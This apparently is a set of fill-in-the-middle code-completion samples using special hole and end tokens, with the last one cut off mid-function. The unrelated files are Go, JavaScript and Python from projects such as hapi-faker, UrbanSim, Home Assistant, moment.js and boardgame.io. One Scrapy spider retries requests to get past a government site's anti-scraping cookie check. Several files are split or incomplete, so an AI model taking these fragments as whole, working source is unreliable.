for i, fieldName := range fieldLine.Names {
fieldToks[i].Name = parseIdent(fieldName)
}
var fieldType string
// get field type
switch typeToken := fieldLine.Type.(type) {
case *ast.Ident:
// simple types, e.g. bool, int
fieldType = parseIdent(typeToken)
case *ast.SelectorExpr:
// struct fields, e.g. time.Time, sql.NullString
fieldType = parseSelector(typeToken)
case *ast.ArrayType:
// arrays
fieldType = parseArray(typeToken)
case *ast.StarExpr:
// pointers
fieldType = parseStar(typeToken)
}
if fieldType == "" {
continue
}
// apply type to all variables declared in this line
for i := range fieldToks {
fieldToks[i].Type = fieldType
}
structTok.Fields = append(structTok.Fields, fieldToks...)
}
structToks = append(structToks, structTok)
}
}
return structToks, nil
}
func parseIdent(fieldType *ast.Ident) string {
// return like byte, string, int
return fieldType.Name
}
func parseSelector(fieldType *ast.SelectorExpr) string {
// return like time.Time, sql.NullString
ident, isIdent := fieldType.X.(*ast.Ident)
if !isIdent {
return ""
}
return fmt.Sprintf("%s.%s", parseIdent(ident), fieldType.Sel.Name)
}
func parseArray(fieldType *ast.ArrayType) string {
// return like []byte, []time.Time, []*byte, []*sql.NullString
var arrayType string
switch typeToken := fieldType.Elt.(type) {
case *ast.Ident:
arrayType = parseIdent(typeToken)
case *ast.SelectorExpr:
arrayType = parseSelector(typeToken)
case *ast.StarExpr:
arrayType = parseStar(typeToken)
}
if arrayType == "" {
return ""
}
return fmt.Sprintf("[]%s", arrayType)
}
func parseStar(fieldType *ast.StarExpr) string {
// return like *bool, *time.Time, *[]byte, and other array stuff
var starType string
switch typeToken := fieldType.X.(type) {
case *ast.Ident:
starType = parseIdent(typeToken)
case *ast.SelectorExpr:
starType = parseSelector(typeToken)
case *ast.ArrayType:
starType = parseArray(typeToken)
}
if starType == "" {
return ""
}
return fmt.Sprintf("*%s", starType)
}
func genFile(outFile, pkg string, unexport bool, toks []structToken) error {
if len(toks) < 1 {
return errors.New("no structs found")
}
fout, err := os.Create(outFile)
if err != nil {
return err
}
defer fout.Close()
data := struct {
PackageName string
Tokens []structToken
Visibility string
}{
PackageName: pkg,
Visibility: "S",
Tokens: toks,
}
if unexport {
// func name will be scanFoo instead of ScanFoo
data.Visibility = "s"
}
fnMap := template.FuncMap{"title": strings.Title}
scansTmpl, err := template.New("scans").Funcs(fnMap).Parse(scansText)
if err != nil {
return err
}
if err := scansTmpl.Execute(fout, data); err != nil {
return err
}
return nil
}<|fim▁end|>
|
outFilename := flag.String("o", "scans.go", "")
packName := flag.String("p", "current directory", "")
unexport := flag.Bool("u", false, "")
|
<|file_name|>hapi-faker.js<|end_file_name|><|fim▁begin|>var jfs = require('json-schema-faker');
var mout = require('mout');
var Joi = require('joi');
var bluebird = require('bluebird');
var HapiFaker = function(options) {
if (!(this instanceof HapiFaker))
return new HapiFaker(options);
var result = Joi.validate(options, Joi.object({
schemas: Joi.array().items(Joi.object({
id: Joi.string().required(),
type: Joi.string().required()
}).unknown(true)).optional().default([]),
attachAt: Joi.string().only(['onRequest', 'onPreAuth', 'onPostAuth',
'onPreHandler', 'onPostHandler', 'onPreResponse'
]).default('onPostAuth'),
hooks: Joi.object({
request: Joi.func().optional()
}).optional().default({}),
jfs: Joi.func().optional().default(undefined)
}).optional().default({}));
if (result.error)
throw result.error;
this._options = mout.lang.deepClone(result.value);<|fim▁hole|> this._options.jfs = jfs;
};
HapiFaker.prototype.attach = function(server) {
this._server = server;
// Capture requests to do the default job
server.ext(this._options.attachAt, this._hook, {
bind: this
});
// Add a new handler in case the user want's to
server.handler('faker', this._handler.bind(this));
// Add a new method in the reply interface
server.decorate('reply', 'faker', this._decorator(this));
// Expose our options server wide
server.expose('options', mout.lang.deepClone(this._options));
};
HapiFaker.prototype._hook = function(request, reply) {
var settings = request.route.settings.plugins;
var that = this;
// If this route isn't configured for faker, just ignore
if (!settings || !settings.faker)
return reply.continue();
var req = this._options.hooks.request;
bluebird
.resolve()
.then(req ? req.bind(this, request, reply) : function() {
return true;
})
.then(function(enable) {
if (!enable)
return reply.continue();
return bluebird
.resolve(that._genData(settings.faker))
.then(function(data) {
reply(data);
});
}).catch(function(err) {
// Enable Hapi to handle our errors
process.nextTick(function() {
throw err;
});
});
};
HapiFaker.prototype._handler = function(route, options) {
var that = this;
return function(request, reply) {
reply(that._genData(options));
};
};
HapiFaker.prototype._decorator = function(ctx) {
var that = ctx;
return function(input) {
this(that._genData(input));
};
};
HapiFaker.prototype._genData = function(input) {
var schema = null;
if (typeof input === 'string')
schema = this._options.schemas.filter(function(s) {
return s.id === input;
})[0];
else
schema = input;
if (!schema)
throw new Error('Unknown faker schema with ID ' + input);
// Do not modify the original schema
schema = mout.lang.deepClone(schema);
return this._options.jfs(schema, this._options.schemas);
};
module.exports = HapiFaker;<|fim▁end|>
|
if (!this._options.jfs)
|
<|file_name|>SSS_travel_time_to_DDD.py<|end_file_name|><|fim▁begin|># Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.abstract_variables.abstract_travel_time_variable_for_non_interaction_dataset import abstract_travel_time_variable_for_non_interaction_dataset
class SSS_travel_time_to_DDD(abstract_travel_time_variable_for_non_interaction_dataset):
"""Travel time by mode SSS to the zone whose ID is the DDD.
"""
default_value = 999
origin_zone_id = 'zone.zone_id'
def __init__(self, mode, number):
self.travel_data_attribute = "travel_data.%s" % mode
self.destination_zone_id = "destination_zone_id=%s+0*zone.zone_id" % number
abstract_travel_time_variable_for_non_interaction_dataset.__init__(self)
from opus_core.tests import opus_unittest
from numpy import array, arange
from opus_core.tests.utils.variable_tester import VariableTester
class Tests(opus_unittest.OpusTestCase):
def do(self,sss, ddd, should_be):
tester = VariableTester(
__file__,
package_order=['urbansim'],
test_data={
"zone":{
"zone_id":array([1,3])},
<|fim▁hole|> "travel_data":{
"from_zone_id":array([3,3,1,1]),
"to_zone_id":array([1,3,1,3]),
sss:array([1.1, 2.2, 3.3, 4.4])}
}
)
instance_name = "sanfrancisco.zone.%s_travel_time_to_%s" % (sss, ddd)
tester.test_is_close_for_family_variable(self, should_be, instance_name)
def test_to_1(self):
should_be = array([3.3, 1.1])
self.do('hwy', 1, should_be)
def test_to_3(self):
should_be = array([4.4, 2.2])
self.do('bart', 3, should_be)
if __name__=='__main__':
opus_unittest.main()<|fim▁end|>
| |
<|file_name|>runtime.go<|end_file_name|><|fim▁begin|>package sodium
// #cgo pkg-config: libsodium
// #include <stdlib.h>
// #include <sodium.h>
import "C"
func RuntimeHasNeon() bool {
return C.sodium_runtime_has_neon() != 0
}
func RuntimeHasSse2() bool {
return C.sodium_runtime_has_sse2() != 0
}
func RuntimeHasSse3() bool {<|fim▁hole|> return C.sodium_runtime_has_sse3() != 0
}<|fim▁end|>
| |
<|file_name|>resolutions.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import scrapy
from scraper.items import ResolutionItem
class ResolutionSpider(scrapy.Spider):
name = "resolutions"
allowed_domains = ["www.pmo.gov.il"]
start_urls = ["http://www.pmo.gov.il/Secretary/GovDecisions/Pages/default.aspx"]
def should_retry(self, response):
"""Sometimes body uses anti-scraping tricks.
e.g. body is:
<html><body><script>document.cookie='yyyyyyy=ea850ff3yyyyyyy_ea850ff3; path=/';window.location.href=window.location.href;</script></body></html>
Retrying usually yields a correct response.
"""
if not response.body.startswith('<html><body><script>'):
return False
self.logger.debug('anti-scraping trick for url %s', response.url)
new_request = response.request.copy()
new_request.dont_filter = True # don't de-duplicate the url for retrying
return new_request
def parse(self, response):
"""Parse pages containing links to government resolutions."""
# check if response was bad
new_request = self.should_retry(response)
# retry if so
if new_request:
yield new_request
return
# parse specific resolutions found in current page
for sel in response.xpath("//div[@id='GDSR']/div/a/@href"):
yield scrapy.Request(sel.extract(), callback=self.parse_resolution)
# parse next pages
for sel in response.xpath("//a[@class='PMM-resultsPagingNumber']/@href"):
url = response.urljoin(sel.extract())
yield scrapy.Request(url)
def parse_resolution(self, response):
"""Scrape relevant fields in specific resolution response."""
# check if response was bad
new_request = self.should_retry(response)
# retry if so
if new_request:
yield new_request
return
try:
yield ResolutionItem(
url=response.url,
date=response.xpath("/html/head/meta[@name='EventDate']/@content").extract(),
resolution_number=response.xpath("//*[@id='aspnetForm']/@action").extract(),
gov=response.xpath("/html/head/meta[@name='Subjects']/@content").extract(),
title=response.xpath("//h1[@class='mainTitle']//text()").extract(),<|fim▁hole|> subject=response.xpath("//div[@id='ctl00_PlaceHolderMain_GovXParagraph1Panel']//text()[not(ancestor::h3)]").extract(),
body=response.xpath("//*[@id='ctl00_PlaceHolderMain_GovXParagraph2Panel']//text()[not(ancestor::h3)]").extract(),
)
except AttributeError:
self.logger.error('bad body in response for url %s and body %s',
response.url, response.body)<|fim▁end|>
| |
<|file_name|>camera.py<|end_file_name|><|fim▁begin|>"""
This component provides basic support for Amcrest IP cameras.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/camera.amcrest/
"""
import logging
from homeassistant.components.amcrest import (
DATA_AMCREST, STREAM_SOURCE_LIST, TIMEOUT)
from homeassistant.components.camera import Camera
from homeassistant.components.ffmpeg import DATA_FFMPEG
from homeassistant.const import CONF_NAME
from homeassistant.helpers.aiohttp_client import (
async_get_clientsession, async_aiohttp_proxy_web,
async_aiohttp_proxy_stream)
DEPENDENCIES = ['amcrest', 'ffmpeg']
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up an Amcrest IP Camera."""
if discovery_info is None:
return
device_name = discovery_info[CONF_NAME]
amcrest = hass.data[DATA_AMCREST][device_name]
async_add_entities([AmcrestCam(hass, amcrest)], True)
return True
class AmcrestCam(Camera):
"""An implementation of an Amcrest IP camera."""
def __init__(self, hass, amcrest):
"""Initialize an Amcrest camera."""
super(AmcrestCam, self).__init__()
self._name = amcrest.name
self._camera = amcrest.device
self._base_url = self._camera.get_base_url()
self._ffmpeg = hass.data[DATA_FFMPEG]
self._ffmpeg_arguments = amcrest.ffmpeg_arguments
self._stream_source = amcrest.stream_source<|fim▁hole|> self._token = self._auth = amcrest.authentication
def camera_image(self):
"""Return a still image response from the camera."""
# Send the request to snap a picture and return raw jpg data
response = self._camera.snapshot(channel=self._resolution)
return response.data
async def handle_async_mjpeg_stream(self, request):
"""Return an MJPEG stream."""
# The snapshot implementation is handled by the parent class
if self._stream_source == STREAM_SOURCE_LIST['snapshot']:
return await super().handle_async_mjpeg_stream(request)
if self._stream_source == STREAM_SOURCE_LIST['mjpeg']:
# stream an MJPEG image stream directly from the camera
websession = async_get_clientsession(self.hass)
streaming_url = self._camera.mjpeg_url(typeno=self._resolution)
stream_coro = websession.get(
streaming_url, auth=self._token, timeout=TIMEOUT)
return await async_aiohttp_proxy_web(
self.hass, request, stream_coro)
# streaming via ffmpeg
from haffmpeg import CameraMjpeg
streaming_url = self._camera.rtsp_url(typeno=self._resolution)
stream = CameraMjpeg(self._ffmpeg.binary, loop=self.hass.loop)
await stream.open_camera(
streaming_url, extra_cmd=self._ffmpeg_arguments)
try:
return await async_aiohttp_proxy_stream(
self.hass, request, stream,
self._ffmpeg.ffmpeg_stream_content_type)
finally:
await stream.close()
@property
def name(self):
"""Return the name of this camera."""
return self._name<|fim▁end|>
|
self._resolution = amcrest.resolution
|
<|file_name|>be.js<|end_file_name|><|fim▁begin|>//! moment.js locale configuration
//! locale : belarusian (be)
//! author : Dmitry Demidov : https://github.com/demidov91
//! author: Praleska: http://praleska.pro/
//! Author : Menelion Elensúle : https://github.com/Oire
import moment from '../moment';
function plural(word, num) {
var forms = word.split('_');
return num % 10 === 1 && num % 100 !== 11 ? forms[0] : (num % 10 >= 2 && num % 10 <= 4 && (num % 100 < 10 || num % 100 >= 20) ? forms[1] : forms[2]);
}
function relativeTimeWithPlural(number, withoutSuffix, key) {
var format = {
'mm': withoutSuffix ? 'хвіліна_хвіліны_хвілін' : 'хвіліну_хвіліны_хвілін',
'hh': withoutSuffix ? 'гадзіна_гадзіны_гадзін' : 'гадзіну_гадзіны_гадзін',
'dd': 'дзень_дні_дзён',
'MM': 'месяц_месяцы_месяцаў',
'yy': 'год_гады_гадоў'
};
if (key === 'm') {
return withoutSuffix ? 'хвіліна' : 'хвіліну';<|fim▁hole|> return withoutSuffix ? 'гадзіна' : 'гадзіну';
}
else {
return number + ' ' + plural(format[key], +number);
}
}
function monthsCaseReplace(m, format) {
var months = {
'nominative': 'студзень_люты_сакавік_красавік_травень_чэрвень_ліпень_жнівень_верасень_кастрычнік_лістапад_снежань'.split('_'),
'accusative': 'студзеня_лютага_сакавіка_красавіка_траўня_чэрвеня_ліпеня_жніўня_верасня_кастрычніка_лістапада_снежня'.split('_')
},
nounCase = (/D[oD]?(\[[^\[\]]*\]|\s+)+MMMM?/).test(format) ?
'accusative' :
'nominative';
return months[nounCase][m.month()];
}
function weekdaysCaseReplace(m, format) {
var weekdays = {
'nominative': 'нядзеля_панядзелак_аўторак_серада_чацвер_пятніца_субота'.split('_'),
'accusative': 'нядзелю_панядзелак_аўторак_сераду_чацвер_пятніцу_суботу'.split('_')
},
nounCase = (/\[ ?[Вв] ?(?:мінулую|наступную)? ?\] ?dddd/).test(format) ?
'accusative' :
'nominative';
return weekdays[nounCase][m.day()];
}
export default moment.defineLocale('be', {
months : monthsCaseReplace,
monthsShort : 'студ_лют_сак_крас_трав_чэрв_ліп_жнів_вер_каст_ліст_снеж'.split('_'),
weekdays : weekdaysCaseReplace,
weekdaysShort : 'нд_пн_ат_ср_чц_пт_сб'.split('_'),
weekdaysMin : 'нд_пн_ат_ср_чц_пт_сб'.split('_'),
longDateFormat : {
LT : 'HH:mm',
LTS : 'HH:mm:ss',
L : 'DD.MM.YYYY',
LL : 'D MMMM YYYY г.',
LLL : 'D MMMM YYYY г., HH:mm',
LLLL : 'dddd, D MMMM YYYY г., HH:mm'
},
calendar : {
sameDay: '[Сёння ў] LT',
nextDay: '[Заўтра ў] LT',
lastDay: '[Учора ў] LT',
nextWeek: function () {
return '[У] dddd [ў] LT';
},
lastWeek: function () {
switch (this.day()) {
case 0:
case 3:
case 5:
case 6:
return '[У мінулую] dddd [ў] LT';
case 1:
case 2:
case 4:
return '[У мінулы] dddd [ў] LT';
}
},
sameElse: 'L'
},
relativeTime : {
future : 'праз %s',
past : '%s таму',
s : 'некалькі секунд',
m : relativeTimeWithPlural,
mm : relativeTimeWithPlural,
h : relativeTimeWithPlural,
hh : relativeTimeWithPlural,
d : 'дзень',
dd : relativeTimeWithPlural,
M : 'месяц',
MM : relativeTimeWithPlural,
y : 'год',
yy : relativeTimeWithPlural
},
meridiemParse: /ночы|раніцы|дня|вечара/,
isPM : function (input) {
return /^(дня|вечара)$/.test(input);
},
meridiem : function (hour, minute, isLower) {
if (hour < 4) {
return 'ночы';
} else if (hour < 12) {
return 'раніцы';
} else if (hour < 17) {
return 'дня';
} else {
return 'вечара';
}
},
ordinalParse: /\d{1,2}-(і|ы|га)/,
ordinal: function (number, period) {
switch (period) {
case 'M':
case 'd':
case 'DDD':
case 'w':
case 'W':
return (number % 10 === 2 || number % 10 === 3) && (number % 100 !== 12 && number % 100 !== 13) ? number + '-і' : number + '-ы';
case 'D':
return number + '-га';
default:
return number;
}
},
week : {
dow : 1, // Monday is the first day of the week.
doy : 7 // The week that contains Jan 1st is the first week of the year.
}
});<|fim▁end|>
|
}
else if (key === 'h') {
|
<|file_name|>serial_ports.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""This utility script was adopted from StackExchange:
http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
Adopted for use with arduino_GC connection project
"""
import sys
import glob
import serial
def serial_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/cu[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/cu.*')
else:
raise EnvironmentError('Unsupported platform')
<|fim▁hole|> s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
if __name__ == '__main__':
print(serial_ports())<|fim▁end|>
|
result = []
for port in ports:
try:
|
<|file_name|>reducer-6b2d258d.js<|end_file_name|><|fim▁begin|>import { e as error, E as EnhanceCtx, T as TurnOrder, i as info, S as Stage, a as SetActivePlayersEvent, F as FnWrap, b as SetActivePlayers, I as InitTurnOrderState, U as UpdateTurnOrderState, c as UpdateActivePlayersOnceEmpty, g as gameEvent, d as STRIP_TRANSIENTS, G as GAME_EVENT, f as Enhance, M as MAKE_MOVE, h as INVALID_MOVE, N as NoClient, R as RESET, j as UPDATE, k as SYNC, l as UNDO, m as REDO, P as PLUGIN, n as ProcessAction, o as PATCH, p as FlushAndValidate, q as stripTransients } from './turn-order-21b8f302.js';
import { applyPatch } from 'rfc6902';
/*
* Copyright 2017 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
/**
* Flow
*
* Creates a reducer that updates ctx (analogous to how moves update G).
*/
function Flow({ moves, phases, endIf, onEnd, turn, events, plugins, }) {
// Attach defaults.
if (moves === undefined) {
moves = {};
}
if (events === undefined) {
events = {};
}
if (plugins === undefined) {
plugins = [];
}
if (phases === undefined) {
phases = {};
}
if (!endIf)
endIf = () => undefined;
if (!onEnd)
onEnd = (G) => G;
if (!turn)
turn = {};
const phaseMap = { ...phases };
if ('' in phaseMap) {
error('cannot specify phase with empty name');
}
phaseMap[''] = {};
const moveMap = {};
const moveNames = new Set();
let startingPhase = null;
Object.keys(moves).forEach((name) => moveNames.add(name));
const HookWrapper = (fn) => {
const withPlugins = FnWrap(fn, plugins);
return (state) => {
const ctxWithAPI = EnhanceCtx(state);
return withPlugins(state.G, ctxWithAPI);
};
};
const TriggerWrapper = (endIf) => {
return (state) => {
const ctxWithAPI = EnhanceCtx(state);
return endIf(state.G, ctxWithAPI);
};
};
const wrapped = {
onEnd: HookWrapper(onEnd),
endIf: TriggerWrapper(endIf),
};
for (const phase in phaseMap) {
const phaseConfig = phaseMap[phase];
if (phaseConfig.start === true) {
startingPhase = phase;
}
if (phaseConfig.moves !== undefined) {
for (const move of Object.keys(phaseConfig.moves)) {
moveMap[phase + '.' + move] = phaseConfig.moves[move];
moveNames.add(move);
}
}
if (phaseConfig.endIf === undefined) {
phaseConfig.endIf = () => undefined;
}
if (phaseConfig.onBegin === undefined) {
phaseConfig.onBegin = (G) => G;
}
if (phaseConfig.onEnd === undefined) {
phaseConfig.onEnd = (G) => G;
}
if (phaseConfig.turn === undefined) {
phaseConfig.turn = turn;
}
if (phaseConfig.turn.order === undefined) {
phaseConfig.turn.order = TurnOrder.DEFAULT;
}
if (phaseConfig.turn.onBegin === undefined) {
phaseConfig.turn.onBegin = (G) => G;
}
if (phaseConfig.turn.onEnd === undefined) {
phaseConfig.turn.onEnd = (G) => G;
}
if (phaseConfig.turn.endIf === undefined) {
phaseConfig.turn.endIf = () => false;
}
if (phaseConfig.turn.onMove === undefined) {
phaseConfig.turn.onMove = (G) => G;
}
if (phaseConfig.turn.stages === undefined) {
phaseConfig.turn.stages = {};
}
for (const stage in phaseConfig.turn.stages) {
const stageConfig = phaseConfig.turn.stages[stage];
const moves = stageConfig.moves || {};
for (const move of Object.keys(moves)) {
const key = phase + '.' + stage + '.' + move;
moveMap[key] = moves[move];
moveNames.add(move);
}
}
phaseConfig.wrapped = {
onBegin: HookWrapper(phaseConfig.onBegin),
onEnd: HookWrapper(phaseConfig.onEnd),
endIf: TriggerWrapper(phaseConfig.endIf),
};
phaseConfig.turn.wrapped = {
onMove: HookWrapper(phaseConfig.turn.onMove),
onBegin: HookWrapper(phaseConfig.turn.onBegin),
onEnd: HookWrapper(phaseConfig.turn.onEnd),
endIf: TriggerWrapper(phaseConfig.turn.endIf),
};
}
function GetPhase(ctx) {
return ctx.phase ? phaseMap[ctx.phase] : phaseMap[''];
}
function OnMove(s) {
return s;
}
function Process(state, events) {
const phasesEnded = new Set();
const turnsEnded = new Set();
for (let i = 0; i < events.length; i++) {
const { fn, arg, ...rest } = events[i];
// Detect a loop of EndPhase calls.
// This could potentially even be an infinite loop
// if the endIf condition of each phase blindly
// returns true. The moment we detect a single
// loop, we just bail out of all phases.
if (fn === EndPhase) {
turnsEnded.clear();
const phase = state.ctx.phase;
if (phasesEnded.has(phase)) {
const ctx = { ...state.ctx, phase: null };
return { ...state, ctx };
}
phasesEnded.add(phase);
}
// Process event.
const next = [];
state = fn(state, {
...rest,
arg,
next,
});
if (fn === EndGame) {
break;
}
// Check if we should end the game.
const shouldEndGame = ShouldEndGame(state);
if (shouldEndGame) {
events.push({
fn: EndGame,
arg: shouldEndGame,
turn: state.ctx.turn,
phase: state.ctx.phase,
automatic: true,
});
continue;
}
// Check if we should end the phase.
const shouldEndPhase = ShouldEndPhase(state);
if (shouldEndPhase) {
events.push({
fn: EndPhase,
arg: shouldEndPhase,
turn: state.ctx.turn,
phase: state.ctx.phase,
automatic: true,
});
continue;
}
// Check if we should end the turn.
if (fn === OnMove || fn === UpdateStage) {
const shouldEndTurn = ShouldEndTurn(state);
if (shouldEndTurn) {
events.push({
fn: EndTurn,
arg: shouldEndTurn,
turn: state.ctx.turn,
phase: state.ctx.phase,
automatic: true,
});
continue;
}
}
events.push(...next);
}
return state;
}
///////////
// Start //
///////////
function StartGame(state, { next }) {
next.push({ fn: StartPhase });
return state;
}
function StartPhase(state, { next }) {
let { G, ctx } = state;
const phaseConfig = GetPhase(ctx);
// Run any phase setup code provided by the user.
G = phaseConfig.wrapped.onBegin(state);
next.push({ fn: StartTurn });
return { ...state, G, ctx };
}
function StartTurn(state, { currentPlayer }) {
let { ctx } = state;
const phaseConfig = GetPhase(ctx);
// Initialize the turn order state.
if (currentPlayer) {
ctx = { ...ctx, currentPlayer };
if (phaseConfig.turn.activePlayers) {
ctx = SetActivePlayers(ctx, phaseConfig.turn.activePlayers);
}
}
else {
// This is only called at the beginning of the phase
// when there is no currentPlayer yet.
ctx = InitTurnOrderState(state, phaseConfig.turn);
}
const turn = ctx.turn + 1;
ctx = { ...ctx, turn, numMoves: 0, _prevActivePlayers: [] };
const G = phaseConfig.turn.wrapped.onBegin({ ...state, ctx });
return { ...state, G, ctx, _undo: [], _redo: [] };
}
////////////
// Update //
////////////
function UpdatePhase(state, { arg, next, phase }) {
const phaseConfig = GetPhase({ phase });
let { ctx } = state;
if (arg && arg.next) {
if (arg.next in phaseMap) {
ctx = { ...ctx, phase: arg.next };
}
else {
error('invalid phase: ' + arg.next);
return state;
}
}
else if (phaseConfig.next !== undefined) {
ctx = { ...ctx, phase: phaseConfig.next };
}
else {
ctx = { ...ctx, phase: null };
}
state = { ...state, ctx };
// Start the new phase.
next.push({ fn: StartPhase });
return state;
}
function UpdateTurn(state, { arg, currentPlayer, next }) {
let { G, ctx } = state;
const phaseConfig = GetPhase(ctx);
// Update turn order state.
const { endPhase, ctx: newCtx } = UpdateTurnOrderState(state, currentPlayer, phaseConfig.turn, arg);
ctx = newCtx;
state = { ...state, G, ctx };
if (endPhase) {
next.push({ fn: EndPhase, turn: ctx.turn, phase: ctx.phase });
}
else {
next.push({ fn: StartTurn, currentPlayer: ctx.currentPlayer });
}
return state;
}
function UpdateStage(state, { arg, playerID }) {
if (typeof arg === 'string' || arg === Stage.NULL) {
arg = { stage: arg };
}
if (typeof arg !== 'object')
return state;
let { ctx } = state;
let { activePlayers, _activePlayersMoveLimit, _activePlayersNumMoves } = ctx;
// Checking if stage is valid, even Stage.NULL
if (arg.stage !== undefined) {
if (activePlayers === null) {
activePlayers = {};
}
activePlayers[playerID] = arg.stage;
_activePlayersNumMoves[playerID] = 0;
if (arg.moveLimit) {
if (_activePlayersMoveLimit === null) {
_activePlayersMoveLimit = {};
}
_activePlayersMoveLimit[playerID] = arg.moveLimit;
}
}
ctx = {
...ctx,
activePlayers,
_activePlayersMoveLimit,
_activePlayersNumMoves,
};
return { ...state, ctx };
}
///////////////
// ShouldEnd //
///////////////
function ShouldEndGame(state) {
return wrapped.endIf(state);
}
function ShouldEndPhase(state) {
const phaseConfig = GetPhase(state.ctx);
return phaseConfig.wrapped.endIf(state);
}
function ShouldEndTurn(state) {
const phaseConfig = GetPhase(state.ctx);
// End the turn if the required number of moves has been made.
const currentPlayerMoves = state.ctx.numMoves || 0;
if (phaseConfig.turn.moveLimit &&
currentPlayerMoves >= phaseConfig.turn.moveLimit) {
return true;
}
return phaseConfig.turn.wrapped.endIf(state);
}
/////////
// End //
/////////
function EndGame(state, { arg, phase }) {
state = EndPhase(state, { phase });
if (arg === undefined) {
arg = true;
}
state = { ...state, ctx: { ...state.ctx, gameover: arg } };
// Run game end hook.
const G = wrapped.onEnd(state);
return { ...state, G };
}
function EndPhase(state, { arg, next, turn: initialTurn, automatic }) {
// End the turn first.
state = EndTurn(state, { turn: initialTurn, force: true, automatic: true });
const { phase, turn } = state.ctx;
if (next) {
next.push({ fn: UpdatePhase, arg, phase });
}
// If we aren't in a phase, there is nothing else to do.
if (phase === null) {
return state;
}
// Run any cleanup code for the phase that is about to end.
const phaseConfig = GetPhase(state.ctx);
const G = phaseConfig.wrapped.onEnd(state);
// Reset the phase.
const ctx = { ...state.ctx, phase: null };
// Add log entry.
const action = gameEvent('endPhase', arg);
const { _stateID } = state;
const logEntry = { action, _stateID, turn, phase };
if (automatic)
logEntry.automatic = true;
const deltalog = [...(state.deltalog || []), logEntry];
return { ...state, G, ctx, deltalog };
}
function EndTurn(state, { arg, next, turn: initialTurn, force, automatic, playerID }) {
// This is not the turn that EndTurn was originally
// called for. The turn was probably ended some other way.
if (initialTurn !== state.ctx.turn) {
return state;
}
const { currentPlayer, numMoves, phase, turn } = state.ctx;
const phaseConfig = GetPhase(state.ctx);
// Prevent ending the turn if moveLimit hasn't been reached.
const currentPlayerMoves = numMoves || 0;
if (!force &&
phaseConfig.turn.moveLimit &&
currentPlayerMoves < phaseConfig.turn.moveLimit) {
info(`cannot end turn before making ${phaseConfig.turn.moveLimit} moves`);
return state;
}
// Run turn-end triggers.
const G = phaseConfig.turn.wrapped.onEnd(state);
if (next) {
next.push({ fn: UpdateTurn, arg, currentPlayer });
}
// Reset activePlayers.
let ctx = { ...state.ctx, activePlayers: null };
// Remove player from playerOrder
if (arg && arg.remove) {
playerID = playerID || currentPlayer;
const playOrder = ctx.playOrder.filter((i) => i != playerID);
const playOrderPos = ctx.playOrderPos > playOrder.length - 1 ? 0 : ctx.playOrderPos;
ctx = { ...ctx, playOrder, playOrderPos };
if (playOrder.length === 0) {
next.push({ fn: EndPhase, turn, phase });
return state;
}
}
// Create log entry.
const action = gameEvent('endTurn', arg);
const { _stateID } = state;
const logEntry = { action, _stateID, turn, phase };
if (automatic)
logEntry.automatic = true;
const deltalog = [...(state.deltalog || []), logEntry];
return { ...state, G, ctx, deltalog, _undo: [], _redo: [] };
}
function EndStage(state, { arg, next, automatic, playerID }) {
playerID = playerID || state.ctx.currentPlayer;
let { ctx, _stateID } = state;
let { activePlayers, _activePlayersMoveLimit, phase, turn } = ctx;
const playerInStage = activePlayers !== null && playerID in activePlayers;
if (!arg && playerInStage) {
const phaseConfig = GetPhase(ctx);
const stage = phaseConfig.turn.stages[activePlayers[playerID]];
if (stage && stage.next)
arg = stage.next;
}
// Checking if arg is a valid stage, even Stage.NULL
if (next) {
next.push({ fn: UpdateStage, arg, playerID });
}
// If player isn’t in a stage, there is nothing else to do.
if (!playerInStage)
return state;
// Remove player from activePlayers.
activePlayers = { ...activePlayers };
delete activePlayers[playerID];
if (_activePlayersMoveLimit) {
// Remove player from _activePlayersMoveLimit.
_activePlayersMoveLimit = { ..._activePlayersMoveLimit };
delete _activePlayersMoveLimit[playerID];
}
ctx = UpdateActivePlayersOnceEmpty({
...ctx,
activePlayers,
_activePlayersMoveLimit,
});
// Create log entry.
const action = gameEvent('endStage', arg);
const logEntry = { action, _stateID, turn, phase };
if (automatic)
logEntry.automatic = true;
const deltalog = [...(state.deltalog || []), logEntry];
return { ...state, ctx, deltalog };
}
/**
* Retrieves the relevant move that can be played by playerID.
*
* If ctx.activePlayers is set (i.e. one or more players are in some stage),
* then it attempts to find the move inside the stages config for
* that turn. If the stage for a player is '', then the player is
* allowed to make a move (as determined by the phase config), but
* isn't restricted to a particular set as defined in the stage config.
*
* If not, it then looks for the move inside the phase.
*
* If it doesn't find the move there, it looks at the global move definition.
*
* @param {object} ctx
* @param {string} name
* @param {string} playerID
*/
function GetMove(ctx, name, playerID) {
const phaseConfig = GetPhase(ctx);
const stages = phaseConfig.turn.stages;
const { activePlayers } = ctx;
if (activePlayers &&
activePlayers[playerID] !== undefined &&
activePlayers[playerID] !== Stage.NULL &&
stages[activePlayers[playerID]] !== undefined &&
stages[activePlayers[playerID]].moves !== undefined) {
// Check if moves are defined for the player's stage.
const stage = stages[activePlayers[playerID]];
const moves = stage.moves;
if (name in moves) {
return moves[name];
}
}
else if (phaseConfig.moves) {
// Check if moves are defined for the current phase.
if (name in phaseConfig.moves) {
return phaseConfig.moves[name];
}
}
else if (name in moves) {
// Check for the move globally.
return moves[name];
}
return null;
}
function ProcessMove(state, action) {
const { playerID, type } = action;
const { ctx } = state;
const { currentPlayer, activePlayers, _activePlayersMoveLimit } = ctx;
const move = GetMove(ctx, type, playerID);
const shouldCount = !move || typeof move === 'function' || move.noLimit !== true;
let { numMoves, _activePlayersNumMoves } = ctx;
if (shouldCount) {
if (playerID === currentPlayer)
numMoves++;
if (activePlayers)
_activePlayersNumMoves[playerID]++;
}
state = {
...state,
ctx: {
...ctx,
